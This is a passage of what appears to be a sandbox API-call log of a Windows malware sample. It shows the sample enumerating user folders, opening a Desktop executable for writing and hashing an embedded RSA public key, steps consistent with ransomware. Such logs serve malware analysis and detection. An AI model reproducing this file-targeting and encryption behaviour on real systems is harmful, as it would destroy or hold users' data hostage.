hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.894] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0191.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0191.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.895] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.895] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.895] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.895] PathFindFileNameW (pszPath="") returned="" [0191.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.895] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0191.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0191.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0191.897] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0191.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0191.897] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0191.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0191.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.909] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0191.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0191.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.909] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.909] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.909] PathFindFileNameW (pszPath="") returned="" [0191.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.909] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0191.910] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0191.910] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1aff80, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0x6a1aff80, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x14375f00, ftLastWriteTime.dwHighDateTime=0x1d8a89b, nFileSizeHigh=0x0, nFileSizeLow=0xb6a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", cAlternateFileName="1918CC~1.EXE")) returned 1 [0191.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5e50 [0191.910] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned=".exe" [0191.910] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0191.911] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=748032) returned 1 [0191.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0191.914] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xb69da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.914] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.915] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.915] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x25805, lpOverlapped=0x0) returned 1 [0191.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0191.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.918] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0191.919] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0191.919] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.919] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0191.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0191.920] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.920] SetLastError (dwErrCode=0x0) [0191.920] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.921] SetLastError (dwErrCode=0x0) [0191.921] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.922] GetLastError () returned 0x0 [0191.922] SetLastError (dwErrCode=0x0) [0191.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0191.923] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0191.923] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0191.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0191.924] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0191.924] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0191.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0191.924] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0191.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0191.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x2ea79b0 [0191.928] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0191.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c933d8 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94de0 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934b0 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93498 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0191.929] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2ecd1c8 [0191.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ecd3e8 [0191.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0191.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0191.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ecd3e8 | out: hHeap=0x620000) returned 1 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934e0 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93498 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0191.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0191.931] HeapFree (in: hHeap=0x620000, 